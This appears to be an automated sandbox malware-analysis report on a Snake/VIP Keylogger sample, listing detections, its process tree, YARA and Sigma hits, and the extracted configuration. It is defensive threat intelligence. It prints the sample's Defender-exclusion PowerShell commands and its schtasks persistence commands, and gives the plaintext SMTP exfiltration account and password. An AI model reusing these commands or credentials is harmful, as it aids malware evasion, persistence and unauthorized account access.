Edit tour

Windows Analysis Report
7495 P.exe

Overview

General Information

Sample name:	7495 P.exe
Analysis ID:	1638563
MD5:	3b2219b39759e198307666db5f7c560c
SHA1:	05d4aadc4563f222f807b25e6bffcf38ad6c0c48
SHA256:	5713945e8a95c45d22ea948a84e37708dac21140f6434181c2c3707726dec361
Tags:	exeuser-julianmckein
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

7495 P.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\7495 P.exe" MD5: 3B2219B39759E198307666DB5F7C560C)

powershell.exe (PID: 8384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 8584 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7495 P.exe (PID: 8812 cmdline: "C:\Users\user\Desktop\7495 P.exe" MD5: 3B2219B39759E198307666DB5F7C560C)

HRrXXnBIpL.exe (PID: 8888 cmdline: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe MD5: 3B2219B39759E198307666DB5F7C560C)

schtasks.exe (PID: 9040 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 9052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HRrXXnBIpL.exe (PID: 9096 cmdline: "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe" MD5: 3B2219B39759E198307666DB5F7C560C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x112c:$a1: get_encryptedPassword 0x1455:$a2: get_encryptedUsername 0xf3c:$a3: get_timePasswordChanged 0x1045:$a4: get_passwordField 0x1142:$a5: set_encryptedPassword 0x2801:$a7: get_logins 0x2764:$a10: KeyLoggerEventArgs 0x23c9:$a11: KeyLoggerEventArgsEventHandler
00000012.00000002.3727156029.000000000043E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eb5c:$a1: get_encryptedPassword 0x7297c:$a1: get_encryptedPassword 0xb659c:$a1: get_encryptedPassword 0x2ee85:$a2: get_encryptedUsername 0x72ca5:$a2: get_encryptedUsername 0xb68c5:$a2: get_encryptedUsername 0x2e96c:$a3: get_timePasswordChanged 0x7278c:$a3: get_timePasswordChanged 0xb63ac:$a3: get_timePasswordChanged 0x2ea75:$a4: get_passwordField 0x72895:$a4: get_passwordField 0xb64b5:$a4: get_passwordField 0x2eb72:$a5: set_encryptedPassword 0x72992:$a5: set_encryptedPassword 0xb65b2:$a5: set_encryptedPassword 0x30231:$a7: get_logins 0x74051:$a7: get_logins 0xb7c71:$a7: get_logins 0x30194:$a10: KeyLoggerEventArgs 0x73fb4:$a10: KeyLoggerEventArgs 0xb7bd4:$a10: KeyLoggerEventArgs
0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f1ac:$a1: get_encryptedPassword 0x72fcc:$a1: get_encryptedPassword 0xb6bec:$a1: get_encryptedPassword 0x2f4d5:$a2: get_encryptedUsername 0x732f5:$a2: get_encryptedUsername 0xb6f15:$a2: get_encryptedUsername 0x2efbc:$a3: get_timePasswordChanged 0x72ddc:$a3: get_timePasswordChanged 0xb69fc:$a3: get_timePasswordChanged 0x2f0c5:$a4: get_passwordField 0x72ee5:$a4: get_passwordField 0xb6b05:$a4: get_passwordField 0x2f1c2:$a5: set_encryptedPassword 0x72fe2:$a5: set_encryptedPassword 0xb6c02:$a5: set_encryptedPassword 0x30881:$a7: get_logins 0x746a1:$a7: get_logins 0xb82c1:$a7: get_logins 0x307e4:$a10: KeyLoggerEventArgs 0x74604:$a10: KeyLoggerEventArgs 0xb8224:$a10: KeyLoggerEventArgs
Process Memory Space: 7495 P.exe PID: 5272	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7495 P.exe PID: 5272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 7495 P.exe PID: 5272	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 7495 P.exe PID: 5272	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 7495 P.exe PID: 5272	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x49f62:$a1: get_encryptedPassword 0x4a281:$a2: get_encryptedUsername 0x49d7c:$a3: get_timePasswordChanged 0x49e85:$a4: get_passwordField 0x49f78:$a5: set_encryptedPassword 0x4c45d:$a7: get_logins 0x4c3c0:$a10: KeyLoggerEventArgs 0x4c029:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 7495 P.exe PID: 8812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7495 P.exe PID: 8812	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 7495 P.exe PID: 8812	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 7495 P.exe PID: 8812	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c871:$a1: get_encryptedPassword 0x2cb90:$a2: get_encryptedUsername 0x2c68b:$a3: get_timePasswordChanged 0x2c794:$a4: get_passwordField 0x2c887:$a5: set_encryptedPassword 0x2ed6c:$a7: get_logins 0x2eccf:$a10: KeyLoggerEventArgs 0x2e938:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HRrXXnBIpL.exe PID: 8888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HRrXXnBIpL.exe PID: 8888	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HRrXXnBIpL.exe PID: 8888	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HRrXXnBIpL.exe PID: 8888	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HRrXXnBIpL.exe PID: 8888	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa1c2:$a1: get_encryptedPassword 0xa4e1:$a2: get_encryptedUsername 0x9fdc:$a3: get_timePasswordChanged 0xa0e5:$a4: get_passwordField 0xa1d8:$a5: set_encryptedPassword 0xc6bd:$a7: get_logins 0xc620:$a10: KeyLoggerEventArgs 0xc289:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HRrXXnBIpL.exe PID: 9096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HRrXXnBIpL.exe PID: 9096	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.HRrXXnBIpL.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.7495 P.exe.47d0650.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.7495 P.exe.47d0650.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.7495 P.exe.47d0650.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.7495 P.exe.47d0650.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52c:$a1: get_encryptedPassword 0x2c855:$a2: get_encryptedUsername 0x2c33c:$a3: get_timePasswordChanged 0x2c445:$a4: get_passwordField 0x2c542:$a5: set_encryptedPassword 0x2dc01:$a7: get_logins 0x2db64:$a10: KeyLoggerEventArgs 0x2d7c9:$a11: KeyLoggerEventArgsEventHandler
2.2.7495 P.exe.47d0650.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a284:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39927:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b84:$a4: \Orbitum\User Data\Default\Login Data 0x3a563:$a5: \Kometa\User Data\Default\Login Data
2.2.7495 P.exe.47d0650.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d165:$s1: UnHook 0x2d16c:$s2: SetHook 0x2d174:$s3: CallNextHook 0x2d181:$s4: _hook
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.7495 P.exe.478c830.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52c:$a1: get_encryptedPassword 0x2c855:$a2: get_encryptedUsername 0x2c33c:$a3: get_timePasswordChanged 0x2c445:$a4: get_passwordField 0x2c542:$a5: set_encryptedPassword 0x2dc01:$a7: get_logins 0x2db64:$a10: KeyLoggerEventArgs 0x2d7c9:$a11: KeyLoggerEventArgsEventHandler
2.2.7495 P.exe.478c830.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.7495 P.exe.478c830.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a284:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39927:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b84:$a4: \Orbitum\User Data\Default\Login Data 0x3a563:$a5: \Kometa\User Data\Default\Login Data
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52c:$a1: get_encryptedPassword 0x2c855:$a2: get_encryptedUsername 0x2c33c:$a3: get_timePasswordChanged 0x2c445:$a4: get_passwordField 0x2c542:$a5: set_encryptedPassword 0x2dc01:$a7: get_logins 0x2db64:$a10: KeyLoggerEventArgs 0x2d7c9:$a11: KeyLoggerEventArgsEventHandler
14.2.HRrXXnBIpL.exe.3e3de80.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d165:$s1: UnHook 0x2d16c:$s2: SetHook 0x2d174:$s3: CallNextHook 0x2d181:$s4: _hook
2.2.7495 P.exe.478c830.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c52c:$a1: get_encryptedPassword 0x2c855:$a2: get_encryptedUsername 0x2c33c:$a3: get_timePasswordChanged 0x2c445:$a4: get_passwordField 0x2c542:$a5: set_encryptedPassword 0x2dc01:$a7: get_logins 0x2db64:$a10: KeyLoggerEventArgs 0x2d7c9:$a11: KeyLoggerEventArgsEventHandler
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a284:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39927:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b84:$a4: \Orbitum\User Data\Default\Login Data 0x3a563:$a5: \Kometa\User Data\Default\Login Data
2.2.7495 P.exe.478c830.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a284:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39927:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b84:$a4: \Orbitum\User Data\Default\Login Data 0x3a563:$a5: \Kometa\User Data\Default\Login Data
14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d165:$s1: UnHook 0x2d16c:$s2: SetHook 0x2d174:$s3: CallNextHook 0x2d181:$s4: _hook
2.2.7495 P.exe.478c830.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d165:$s1: UnHook 0x2d16c:$s2: SetHook 0x2d174:$s3: CallNextHook 0x2d181:$s4: _hook
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32c:$a1: get_encryptedPassword 0x71f4c:$a1: get_encryptedPassword 0x2e655:$a2: get_encryptedUsername 0x72275:$a2: get_encryptedUsername 0x2e13c:$a3: get_timePasswordChanged 0x71d5c:$a3: get_timePasswordChanged 0x2e245:$a4: get_passwordField 0x71e65:$a4: get_passwordField 0x2e342:$a5: set_encryptedPassword 0x71f62:$a5: set_encryptedPassword 0x2fa01:$a7: get_logins 0x73621:$a7: get_logins 0x2f964:$a10: KeyLoggerEventArgs 0x73584:$a10: KeyLoggerEventArgs 0x2f5c9:$a11: KeyLoggerEventArgsEventHandler 0x731e9:$a11: KeyLoggerEventArgsEventHandler
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c084:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fca4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b727:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f347:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b984:$a4: \Orbitum\User Data\Default\Login Data 0x7f5a4:$a4: \Orbitum\User Data\Default\Login Data 0x3c363:$a5: \Kometa\User Data\Default\Login Data 0x7ff83:$a5: \Kometa\User Data\Default\Login Data
14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef65:$s1: UnHook 0x72b85:$s1: UnHook 0x2ef6c:$s2: SetHook 0x72b8c:$s2: SetHook 0x2ef74:$s3: CallNextHook 0x72b94:$s3: CallNextHook 0x2ef81:$s4: _hook 0x72ba1:$s4: _hook
2.2.7495 P.exe.47d0650.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.7495 P.exe.47d0650.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.7495 P.exe.47d0650.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.7495 P.exe.47d0650.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32c:$a1: get_encryptedPassword 0x71f4c:$a1: get_encryptedPassword 0x2e655:$a2: get_encryptedUsername 0x72275:$a2: get_encryptedUsername 0x2e13c:$a3: get_timePasswordChanged 0x71d5c:$a3: get_timePasswordChanged 0x2e245:$a4: get_passwordField 0x71e65:$a4: get_passwordField 0x2e342:$a5: set_encryptedPassword 0x71f62:$a5: set_encryptedPassword 0x2fa01:$a7: get_logins 0x73621:$a7: get_logins 0x2f964:$a10: KeyLoggerEventArgs 0x73584:$a10: KeyLoggerEventArgs 0x2f5c9:$a11: KeyLoggerEventArgsEventHandler 0x731e9:$a11: KeyLoggerEventArgsEventHandler
2.2.7495 P.exe.47d0650.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c084:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fca4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b727:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f347:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b984:$a4: \Orbitum\User Data\Default\Login Data 0x7f5a4:$a4: \Orbitum\User Data\Default\Login Data 0x3c363:$a5: \Kometa\User Data\Default\Login Data 0x7ff83:$a5: \Kometa\User Data\Default\Login Data
2.2.7495 P.exe.47d0650.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef65:$s1: UnHook 0x72b85:$s1: UnHook 0x2ef6c:$s2: SetHook 0x72b8c:$s2: SetHook 0x2ef74:$s3: CallNextHook 0x72b94:$s3: CallNextHook 0x2ef81:$s4: _hook 0x72ba1:$s4: _hook
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32c:$a1: get_encryptedPassword 0x7214c:$a1: get_encryptedPassword 0xb5d6c:$a1: get_encryptedPassword 0x2e655:$a2: get_encryptedUsername 0x72475:$a2: get_encryptedUsername 0xb6095:$a2: get_encryptedUsername 0x2e13c:$a3: get_timePasswordChanged 0x71f5c:$a3: get_timePasswordChanged 0xb5b7c:$a3: get_timePasswordChanged 0x2e245:$a4: get_passwordField 0x72065:$a4: get_passwordField 0xb5c85:$a4: get_passwordField 0x2e342:$a5: set_encryptedPassword 0x72162:$a5: set_encryptedPassword 0xb5d82:$a5: set_encryptedPassword 0x2fa01:$a7: get_logins 0x73821:$a7: get_logins 0xb7441:$a7: get_logins 0x2f964:$a10: KeyLoggerEventArgs 0x73784:$a10: KeyLoggerEventArgs 0xb73a4:$a10: KeyLoggerEventArgs
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c084:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fea4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc3ac4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b727:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f547:$a3: \Google\Chrome\User Data\Default\Login Data 0xc3167:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b984:$a4: \Orbitum\User Data\Default\Login Data 0x7f7a4:$a4: \Orbitum\User Data\Default\Login Data 0xc33c4:$a4: \Orbitum\User Data\Default\Login Data 0x3c363:$a5: \Kometa\User Data\Default\Login Data 0x80183:$a5: \Kometa\User Data\Default\Login Data 0xc3da3:$a5: \Kometa\User Data\Default\Login Data
14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef65:$s1: UnHook 0x72d85:$s1: UnHook 0xb69a5:$s1: UnHook 0x2ef6c:$s2: SetHook 0x72d8c:$s2: SetHook 0xb69ac:$s2: SetHook 0x2ef74:$s3: CallNextHook 0x72d94:$s3: CallNextHook 0xb69b4:$s3: CallNextHook 0x2ef81:$s4: _hook 0x72da1:$s4: _hook 0xb69c1:$s4: _hook
2.2.7495 P.exe.478c830.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.7495 P.exe.478c830.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.7495 P.exe.478c830.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.7495 P.exe.478c830.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e32c:$a1: get_encryptedPassword 0x7214c:$a1: get_encryptedPassword 0xb5d6c:$a1: get_encryptedPassword 0x2e655:$a2: get_encryptedUsername 0x72475:$a2: get_encryptedUsername 0xb6095:$a2: get_encryptedUsername 0x2e13c:$a3: get_timePasswordChanged 0x71f5c:$a3: get_timePasswordChanged 0xb5b7c:$a3: get_timePasswordChanged 0x2e245:$a4: get_passwordField 0x72065:$a4: get_passwordField 0xb5c85:$a4: get_passwordField 0x2e342:$a5: set_encryptedPassword 0x72162:$a5: set_encryptedPassword 0xb5d82:$a5: set_encryptedPassword 0x2fa01:$a7: get_logins 0x73821:$a7: get_logins 0xb7441:$a7: get_logins 0x2f964:$a10: KeyLoggerEventArgs 0x73784:$a10: KeyLoggerEventArgs 0xb73a4:$a10: KeyLoggerEventArgs
2.2.7495 P.exe.478c830.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef65:$s1: UnHook 0x72d85:$s1: UnHook 0xb69a5:$s1: UnHook 0x2ef6c:$s2: SetHook 0x72d8c:$s2: SetHook 0xb69ac:$s2: SetHook 0x2ef74:$s3: CallNextHook 0x72d94:$s3: CallNextHook 0xb69b4:$s3: CallNextHook 0x2ef81:$s4: _hook 0x72da1:$s4: _hook 0xb69c1:$s4: _hook
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", ProcessId: 8384, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

